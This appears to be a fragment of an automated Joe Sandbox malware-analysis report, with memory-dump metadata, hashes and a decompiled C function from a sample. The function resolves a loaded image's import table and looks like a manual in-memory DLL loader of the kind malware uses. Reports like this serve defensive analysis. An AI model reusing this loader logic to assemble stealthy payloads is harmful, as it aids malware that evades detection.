                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast
                    • String ID:
                    • API String ID: 1717984340-0
                    • Opcode ID: ea11eef3ccdcdf15ba19d6ac9cc38ee8e9eb33a79ccad8147de2bdf8a620339f
                    • Instruction ID: 5f80505239411662aff514c8d927dba14486697ac718faaffa5c3ff06930faeb
                    • Opcode Fuzzy Hash: ea11eef3ccdcdf15ba19d6ac9cc38ee8e9eb33a79ccad8147de2bdf8a620339f
                    • Instruction Fuzzy Hash: 67412A35600206AFEF218F65C8446BBBBA4EF41350F24416FFA55673A1DB78AC21CF5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00411968(intOrPtr* __ecx) {
                    				intOrPtr _t38;
                    				intOrPtr _t41;
                    				void _t49;
                    				int _t52;
                    				signed short _t54;
                    				signed int _t55;
                    				intOrPtr _t56;
                    				intOrPtr _t58;
                    				intOrPtr _t59;
                    				signed short* _t60;
                    				intOrPtr _t66;
                    				intOrPtr _t69;
                    				intOrPtr _t73;
                    				void _t74;
                    				void* _t77;
                    				intOrPtr* _t78;
                    				void* _t81;
                    				void* _t83;
                    				void* _t84;
                    
                    				_t78 = __ecx;
                    				_t77 = 1;
                    				_t38 =  *__ecx;
                    				_t58 =  *((intOrPtr*)(__ecx + 4));
                    				 *((intOrPtr*)(_t84 + 0x10)) = _t58;
                    				if( *((intOrPtr*)(_t38 + 0x84)) != 0) {
                    					_t81 =  *((intOrPtr*)(_t38 + 0x80)) + _t58;
                    					if(IsBadReadPtr(_t81, 0x14) == 0) {
                    						_t83 = _t81 + 0x10;
                    						while(1) {
                    							_t41 =  *((intOrPtr*)(_t83 - 4));
                    							if(_t41 == 0) {
                    								goto L24;
                    							}
                    							_t59 =  *((intOrPtr*)(_t78 + 0x24))(_t41 + _t58,  *((intOrPtr*)(_t78 + 0x34)));
                    							 *((intOrPtr*)(_t84 + 0x20)) = _t59;
                    							if(_t59 == 0) {
                    								SetLastError(0x7e);
                    								goto L23;
                    							} else {
                    								_push(4 +  *(_t78 + 0xc) * 4);
                    								_push( *((intOrPtr*)(_t78 + 8)));
                    								_t66 = E004408ED();
                    								if(_t66 == 0) {
                    									 *((intOrPtr*)(_t78 + 0x2c))(_t59,  *((intOrPtr*)(_t78 + 0x34)));
                    									SetLastError(0xe);
                    									L23:
                    									_t77 = 0;
                    								} else {
                    									 *((intOrPtr*)(_t78 + 8)) = _t66;
                    									 *((intOrPtr*)(_t66 +  *(_t78 + 0xc) * 4)) = _t59;
                    									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
                    									_t49 =  *(_t83 - 0x10);
                    									if(_t49 == 0) {
                    										_t49 =  *_t83;
                    									}
                    									_t69 =  *((intOrPtr*)(_t84 + 0x14));
                    									_t74 =  *_t83;
                    									_t60 = _t49 + _t69;
                    									if( *_t60 != 0) {
                    										 *((intOrPtr*)(_t84 + 0x10)) = _t74 - _t60 + _t69;
                    										while(1) {
                    											_t54 =  *_t60;
                    											_push( *((intOrPtr*)(_t78 + 0x34)));
                    											if(_t54 >= 0) {
                    												_t55 = _t54 + _t69 + 2;
                    											} else {
                    												_t55 = _t54 & 0x0000ffff;
                    											}
                    											_t56 =  *((intOrPtr*)(_t78 + 0x28))( *((intOrPtr*)(_t84 + 0x20)), _t55);
                    											_t73 =  *((intOrPtr*)(_t84 + 0x1c));
                    											_t84 = _t84 + 0xc;
                    											 *((intOrPtr*)(_t73 + _t60)) = _t56;
                    											if( *((intOrPtr*)(_t73 + _t60)) == 0) {
                    												break;
                    											}
                    											_t69 =  *((intOrPtr*)(_t84 + 0x14));
                    											_t60 =  &(_t60[2]);
                    											if( *_t60 != 0) {
                    												continue;
                    											} else {
                    											}
                    											goto L17;
                    										}
                    										_t77 = 0;
                    									}
                    									L17:
                    									if(_t77 == 0) {
                    										 *((intOrPtr*)(_t78 + 0x2c))( *((intOrPtr*)(_t84 + 0x1c)),  *((intOrPtr*)(_t78 + 0x34)));
                    										SetLastError(0x7f);
                    									} else {
                    										_t83 = _t83 + 0x14;
                    										_t52 = IsBadReadPtr(_t83 - 0x10, 0x14);
                    										_t58 =  *((intOrPtr*)(_t84 + 0x14));
                    										if(_t52 == 0) {
                    											continue;
                    										} else {
                    										}
                    									}
                    								}
                    							}
                    							goto L24;
                    						}
                    					}
                    					L24:
                    				}
                    				return _t77;
                    			}






















                    0x0041196d
                    0x00411972
                    0x00411973
                    0x00411975
                    0x00411978
                    0x00411983
                    0x00411992
                    0x0041199d
                    0x004119a3
                    0x004119a6
                    0x004119a6
                    0x004119ab
                    0x00000000
                    0x00000000
                    0x004119ba
                    0x004119bc
                    0x004119c4
                    0x00411a9a
                    0x00000000
                    0x004119ca
                    0x004119d4
                    0x004119d5
                    0x004119df
                    0x004119e3
                    0x00411a8f
                    0x00411a9a
                    0x00411a9a
                    0x00411aa0
                    0x004119e9
                    0x004119ec
                    0x004119ef
                    0x004119f2
                    0x004119f5
                    0x004119fa
                    0x004119fc
                    0x004119fc
                    0x004119ff
                    0x00411a03
                    0x00411a06
                    0x00411a0c
                    0x00411a13
                    0x00411a17
                    0x00411a17
                    0x00411a19
                    0x00411a1e
                    0x00411a28
                    0x00411a20
                    0x00411a20
                    0x00411a20
                    0x00411a2f
                    0x00411a32
                    0x00411a36
                    0x00411a39
                    0x00411a42
                    0x00000000
                    0x00000000
                    0x00411a44
                    0x00411a48
                    0x00411a4e
                    0x00000000
                    0x00000000
                    0x00411a50
                    0x00000000
                    0x00411a4e
                    0x00411a52
                    0x00411a52
                    0x00411a54
                    0x00411a56
                    0x00411a7c
                    0x00411a83
                    0x00411a58
                    0x00411a58
                    0x00411a61
                    0x00411a67
                    0x00411a6d
                    0x00000000
                    0x00000000
                    0x00411a73
                    0x00411a6d
                    0x00411a56
                    0x004119e3
                    0x00000000
                    0x004119c4
                    0x004119a6
                    0x00411aa2
                    0x00411aa2
                    0x00411aab

                    APIs
                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411CF9), ref: 00411995
                    • IsBadReadPtr.KERNEL32(?,00000014,00411CF9), ref: 00411A61
                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A83
                    • SetLastError.KERNEL32(0000007E,00411CF9), ref: 00411A9A
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastRead
                    • String ID:
                    • API String ID: 4100373531-0
                    • Opcode ID: 445152f347878cb0e8008dd4befcd3cb8da7436c0e877ae463ce7abfa44c4caf
                    • Instruction ID: ebecced5825d7beeb5417844a48948ee3010855cc95e0be1b3aa87ca16da5e01
                    • Opcode Fuzzy Hash: 445152f347878cb0e8008dd4befcd3cb8da7436c0e877ae463ce7abfa44c4caf
                    • Instruction Fuzzy Hash: 53418E716053059FE724CF59EC84BA7BBE4FF44751F00442EE68A87661EB34E849CB15
                    Uniqueness

                    Uniqueness Score: -1.00%